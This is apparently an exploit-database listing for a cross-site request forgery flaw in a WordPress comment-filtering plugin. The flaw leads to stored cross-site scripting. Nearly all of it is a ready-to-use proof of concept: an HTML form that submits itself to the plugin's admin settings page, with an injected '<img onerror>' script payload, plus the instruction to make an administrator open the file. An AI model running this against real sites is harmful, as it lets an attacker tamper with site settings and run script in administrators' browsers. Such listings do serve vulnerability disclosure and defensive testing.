Share
## https://sploitus.com/exploit?id=WPEX-ID:9C1C6D61-5588-4C21-95F6-2818C4F5C355
Make an admin open an HTML file containing the following:

<form action="https://example.com/wp-admin/plugins.php?page=abg_commentsafe" method="POST">
    <input type="text" name="abg_commentsafe_tags" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="abg_commentsafe_behaviour" value="strip">
    <input type="text" name="submit" value="Update Tags">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]                 
    );
</script>